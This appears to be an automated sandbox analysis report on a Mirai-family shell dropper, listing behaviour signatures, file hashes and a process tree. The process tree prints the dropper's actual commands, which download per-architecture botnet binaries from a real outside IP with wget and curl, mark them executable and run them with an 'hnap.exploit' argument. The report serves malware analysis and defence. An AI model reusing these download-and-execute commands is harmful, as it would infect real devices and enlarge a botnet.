Analysis
-
max time kernel
149s
-
max time network
150s
-
platform
ubuntu-18.04_amd64
-
resource
ubuntu1804-amd64-20240508-en
-
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system
-
submitted
12-12-2024 02:40
Static task
static1
Behavioral task
behavioral1
Sample
b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh
-
Size
2KB
-
MD5
0414924f3d84871e5135cdc7433372ff
-
SHA1
e1a734139811fea57eae3589f8442ae29b9de623
-
SHA256
b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e
-
SHA512
a9da40d314c1cfe932787b37785473bcff0dff63983ef3a86682951d30cdd2ae98bc0219ec26a06d70b816aedb3983ca713d0500f3f36967c408a50e23b76916
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
Contacts a large (104140) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
1531  chmod
1578  chmod
1614  chmod
1632  chmod
1513  chmod
1587  chmod
1540  chmod
1560  chmod
1522  chmod
1549  chmod
1569  chmod
1596  chmod
1605  chmod
1623  chmod
1508  chmod
-
Executes dropped EXE 15 IoCs
ioc  pid  Process
/tmp/Andrew  1509  Andrew
/tmp/Andrew  1514  Andrew
/tmp/Andrew  1523  Andrew
/tmp/Andrew  1532  Andrew
/tmp/Andrew  1541  Andrew
/tmp/Andrew  1550  Andrew
/tmp/Andrew  1561  Andrew
/tmp/Andrew  1570  Andrew
/tmp/Andrew  1579  Andrew
/tmp/Andrew  1588  Andrew
/tmp/Andrew  1597  Andrew
/tmp/Andrew  1606  Andrew
/tmp/Andrew  1615  Andrew
/tmp/Andrew  1624  Andrew
/tmp/Andrew  1633  Andrew
-
Modifies Watchdog functionality 1 TTPs 28 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description  ioc  Process
File opened for modification  /dev/watchdog  Andrew  (14 entries)
File opened for modification  /dev/misc/watchdog  Andrew  (14 entries)
-
Enumerates active TCP sockets 1 TTPs 13 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description  ioc  Process
File opened for reading  /proc/net/tcp  Andrew  (13 identical entries)
-
resource  yara_rule
behavioral1/files/fstream-3.dat  upx
behavioral1/files/fstream-6.dat  upx
behavioral1/files/fstream-8.dat  upx
behavioral1/files/fstream-10.dat  upx
behavioral1/files/fstream-12.dat  upx
behavioral1/files/fstream-14.dat  upx
behavioral1/files/fstream-16.dat  upx
behavioral1/files/fstream-20.dat  upx
behavioral1/files/fstream-22.dat  upx
-
Changes its process name 14 IoCs
description  ioc  pid  Process
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1514  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1523  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1532  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1541  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1550  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1561  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1570  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1579  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1588  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1597  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1606  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1615  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1624  Andrew
Changes the process name, possibly in an attempt to hide itself  /var/Sofia  1633  Andrew
-
Reads system network configuration 1 TTPs 13 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description  ioc  Process
File opened for reading  /proc/net/tcp  Andrew  (13 identical entries)
-
Reads runtime system information 14 IoCs
description  ioc  Process
File opened for reading  /proc/  Andrew  (14 identical entries)
-
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid  Process
1534  wget
1538  curl
-
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
description  ioc  Process
File opened for modification  /tmp/i486  curl
File opened for modification  /tmp/x86  curl
File opened for modification  /tmp/x86_64  curl
File opened for modification  /tmp/arm6  wget
File opened for modification  /tmp/sh4  curl
File opened for modification  /tmp/mips  curl
File opened for modification  /tmp/arm4  curl
File opened for modification  /tmp/m68k  curl
File opened for modification  /tmp/mpsl  wget
File opened for modification  /tmp/arm6  curl
File opened for modification  /tmp/spc  curl
File opened for modification  /tmp/arc  curl
File opened for modification  /tmp/i686  wget
File opened for modification  /tmp/mpsl  curl
File opened for modification  /tmp/arm4  wget
File opened for modification  /tmp/arm7  wget
File opened for modification  /tmp/ppc  curl
File opened for modification  /tmp/arm5  wget
File opened for modification  /tmp/arm5  curl
File opened for modification  /tmp/sh4  wget
File opened for modification  /tmp/arm7  curl
File opened for modification  /tmp/ppc  wget
File opened for modification  /tmp/Andrew  b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh
File opened for modification  /tmp/mips  wget
File opened for modification  /tmp/x86  wget
File opened for modification  /tmp/i686  curl
File opened for modification  /tmp/x86_64  wget
Processes
-
/tmp/b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh (level 1)
command: /tmp/b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh
- Writes file to tmp directory
PID:1500
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/i486
PID:1501
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/i486
- Writes file to tmp directory
PID:1506
-
/bin/cat (level 2)
command: cat i486
PID:1507
-
/bin/chmod (level 2)
command: chmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH
- File and Directory Permissions Modification
PID:1508
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
PID:1509
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/x86
- Writes file to tmp directory
PID:1510
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/x86
- Writes file to tmp directory
PID:1511
-
/bin/cat (level 2)
command: cat x86
PID:1512
-
/bin/chmod (level 2)
command: chmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH x86
- File and Directory Permissions Modification
PID:1513
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:1514
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/i686
- Writes file to tmp directory
PID:1516
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/i686
- Writes file to tmp directory
PID:1520
-
/bin/chmod (level 2)
command: chmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH x86
- File and Directory Permissions Modification
PID:1522
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1523
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/x86_64
- Writes file to tmp directory
PID:1525
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/x86_64
- Writes file to tmp directory
PID:1529
-
/bin/chmod (level 2)
command: chmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH x86 x86_64
- File and Directory Permissions Modification
PID:1531
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1532
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/mips
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1534
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/mips
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1538
-
/bin/chmod (level 2)
command: chmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH x86 x86_64
- File and Directory Permissions Modification
PID:1540
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1541
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/mpsl
- Writes file to tmp directory
PID:1543
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/mpsl
- Writes file to tmp directory
PID:1547
-
/bin/chmod (level 2)
command: chmod +x Andrew b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-timedated.service-gKfVuH x86 x86_64
- File and Directory Permissions Modification
PID:1549
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1550
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/arm4
- Writes file to tmp directory
PID:1552
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/arm4
- Writes file to tmp directory
PID:1556
-
/bin/chmod (level 2)
command: chmod +x Andrew arm4 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_64
- File and Directory Permissions Modification
PID:1560
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1561
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/arm5
- Writes file to tmp directory
PID:1563
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/arm5
- Writes file to tmp directory
PID:1567
-
/bin/chmod (level 2)
command: chmod +x Andrew arm4 arm5 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_64
- File and Directory Permissions Modification
PID:1569
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1570
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/arm6
- Writes file to tmp directory
PID:1572
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/arm6
- Writes file to tmp directory
PID:1576
-
/bin/chmod (level 2)
command: chmod +x Andrew arm4 arm5 arm6 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_64
- File and Directory Permissions Modification
PID:1578
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1579
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/arm7
- Writes file to tmp directory
PID:1581
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/arm7
- Writes file to tmp directory
PID:1585
-
/bin/chmod (level 2)
command: chmod +x Andrew arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_64
- File and Directory Permissions Modification
PID:1587
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1588
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/ppc
- Writes file to tmp directory
PID:1590
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/ppc
- Writes file to tmp directory
PID:1594
-
/bin/chmod (level 2)
command: chmod +x Andrew arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 ppc snap-private-tmp ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_64
- File and Directory Permissions Modification
PID:1596
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1597
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/spc
PID:1599
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/spc
- Writes file to tmp directory
PID:1603
-
/bin/chmod (level 2)
command: chmod +x Andrew arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 mips mpsl netplan_pn_7vrk3 ppc snap-private-tmp spc ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_64
- File and Directory Permissions Modification
PID:1605
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1606
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/m68k
PID:1608
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/m68k
- Writes file to tmp directory
PID:1612
-
/bin/chmod (level 2)
command: chmod +x Andrew arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 m68k mips mpsl netplan_pn_7vrk3 ppc snap-private-tmp spc ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_64
- File and Directory Permissions Modification
PID:1614
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1615
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/sh4
- Writes file to tmp directory
PID:1617
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/sh4
- Writes file to tmp directory
PID:1621
-
/bin/chmod (level 2)
command: chmod +x Andrew arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 m68k mips mpsl netplan_pn_7vrk3 ppc sh4 snap-private-tmp spc ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_64
- File and Directory Permissions Modification
PID:1623
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1624
-
/usr/bin/wget (level 2)
command: wget http://37.114.41.90/bins/arc
PID:1626
-
/usr/bin/curl (level 2)
command: curl -O http://37.114.41.90/bins/arc
- Writes file to tmp directory
PID:1630
-
/bin/chmod (level 2)
command: chmod +x Andrew arc arm4 arm5 arm6 arm7 b8a191123b401ab1fd86004d8e915c40737469c409f18b42f04f3925b98f648e.sh config-err-KKijjM i486 i686 m68k mips mpsl netplan_pn_7vrk3 ppc sh4 snap-private-tmp spc ssh-ZXcDyDpzmy48 systemd-private-11c0afe73f7f40d18b1458513933a37e-bolt.service-UhC7Lk systemd-private-11c0afe73f7f40d18b1458513933a37e-colord.service-WIBxUC systemd-private-11c0afe73f7f40d18b1458513933a37e-ModemManager.service-KLfpCg systemd-private-11c0afe73f7f40d18b1458513933a37e-systemd-resolved.service-61erYl x86 x86_64
- File and Directory Permissions Modification
PID:1632
-
/tmp/Andrew (level 2)
command: ./Andrew hnap.exploit
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:1633
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification (1)
Linux and Mac File and Directory Permissions Modification (1)
Impair Defenses (1)
Downloads
-
Filesize
31KB
MD5 b09e32f241911f4ddac45a1a7a19ba49
SHA1 17a7f213570aaea7f66b9c38091c9485fa0ea510
SHA256 42828a483869a643cec73d181faff7f3a433c9570fc96a6bc63a2d8bc2b1f95c
SHA512 1d7e94f3076da3e47e902cc523bb752d5333fcbe86a8f35e6ef11202b80e6021318ff8d60843a410a849dd46296e45ed452bfe01ea722df6bdbdd565fd954da5
-
Filesize
32KB
MD5 bf55d7061cedeb10e6a3839353dc6d8c
SHA1 34b773230a77570ef0c6fced5ab9f125996e4daf
SHA256 aae9d2a9669849b09b4e8ed8f3baeeb4c948ca80ebddd5004a57c2b6b7049fc9
SHA512 555f6dec792e49927d5392fc8dae5174e8868c9acdddebd4d0a5b3386352df40c7342a82d0973979cdb5061ee347f4ebd33ce19ab98fbb6dcae293e1eb69c57e
-
Filesize
50KB
MD5 d5af8f2bb8c7c3e39981ba0099fa1d1c
SHA1 f12212c88dddb3c0298987b917c55063f942df88
SHA256 fec20fde8f5cb8d571cee50a2bf8103c9e63c57b2bfd098693974389fd79c8d9
SHA512 42b3455e467f11b68f000f6f375bd9d7f42d77c16184a3a6a36bbf4751e72a01b692032ee6d03a8ed398484cacbdb6231478d42099004f3674de84873c2e817e
-
Filesize
274B
MD5 090e35476de39030dfeafbcf3d3e3f43
SHA1 a4bd408cec5d1185b478e528cf60a9f5186e0b87
SHA256 0085db6c6f0d1ba4e0ea26fcc04cd3afc69a900a9fd087079c4957364bf4dd1b
SHA512 55c266d1a3bb285ec821ecac894c2f5dbae7798c08e4f829db0e8c06f22084a919ef0fb17a1ddf4640228453bee8555fa6f69025c398292c5c8382e3c466a181
-
Filesize
28KB
MD5 15fb222600a3061f5c8e5ef04e5298a6
SHA1 93b4a17632479c8a45e2554a18ea61ea7365c532
SHA256 fff08f2a1a9c20d447ac5cacb89df1287bb830a2fc0cd5866d31d9f3ba653965
SHA512 11e390838b35bdacfa84ebdfc076f564abc1538bc972895b81d2156be52177bb25d62662871ae624747cca29e089a7a9a6ef205db4c694a2c106641d33942c34
-
Filesize
34KB
MD5 6088a204e0792a10d3724e836fe699b7
SHA1 fc1cf1010c99f155c46f94ec0529c8cea32c6055
SHA256 345984c9618d8bbf1c6e4a70ea62edd4666132f3787dbf07ad118d620cab8a2e
SHA512 bdf6dd68777d986f952a9d3aa5e505aaf360cda74d336c81f5ae1abebdebbdeb595f7bcdb26187f3c59fafbf545265b126435e3ead4346898f328e408bf8e48e
-
Filesize
34KB
MD5 b8f2bf3e7c002718f12751cb02130d2e
SHA1 06919c90eae2564ee9ded3f343e2ec18839e411d
SHA256 390f79cfca6cc7660d64c22208b4f2166807e5875da1a15336a9dccff130034d
SHA512 adfccc7878b168cba5b9f9ce92f246bced0e15db876c28ed2f7e0ec5e344ec6652b643045ca79937de7655da4c71b77db2c778f8b8d11b196bfff156a7d16185
-
Filesize
30KB
MD5 053488c4fc01a20ddb689a2212c33126
SHA1 1eff2d1947ee2d6481fdd2ab4b2a67fba3e18321
SHA256 0a8cb5b485b059b98725ff4a6411faa3ea9f150082b46b0b3868ae0e31b6dd41
SHA512 32d412546f202e9165cf6c905b46d52db20425b7ff7f90b98a739f6c7860b30c34e8bc5eaca4d6f23e25c6e88580990a6003fd9747d581e25098f3267e78f1f9
-
Filesize
65KB
MD5 9092bfedba4c884c57e8a36df072a135
SHA1 d1f5c632f741fea6a9fb73c4bcb930ebe7313e60
SHA256 164fb4af0b74ff37d983392a157a4d9b464391dee726dffcfc205c930a1b062f
SHA512 0f87f9126e11c09f480cf7f74f69d76492f8a8a080afaff1dde7546bae685f48d98774ee50d3c760e77bbc736712fa05a82bf034cbc82ce8e66f1e9d53013b79
-
Filesize
28KB
MD5 54d07ade0004f03aaca028523d8f3eb6
SHA1 73606fc68439ea7ceb148f94d61dbe0235da8355
SHA256 d1270e8be4de4713834930df984a515448ca8dd0acc7b0e03e5aa7fc4428882b
SHA512 43ce9c67151734e6e907a4bf30c06e41b52d524c388273380506b604ce3fed2779ef057b282737b1e05c11055611a4bd0559567253fb1b0f3309114e20eadf4b
-
Filesize
28KB
MD5 9cc970e0631afa61a049848f4f368b12
SHA1 54d7d99f436e9c97da5bfdd43698bb1dbd679b29
SHA256 681951c3fa70c2d14fe48e3c829f9f62f04f8fa9b430c0a87e849e397333dc16
SHA512 9f5bcd759af164b0e22479d44806dce6d3ca3e2b62fa3ac154b83111804cd1ee1df4b549fff0e8ab72d2a2d66dadb0f8f1cc301fee83a711e5c4055c2ee3567e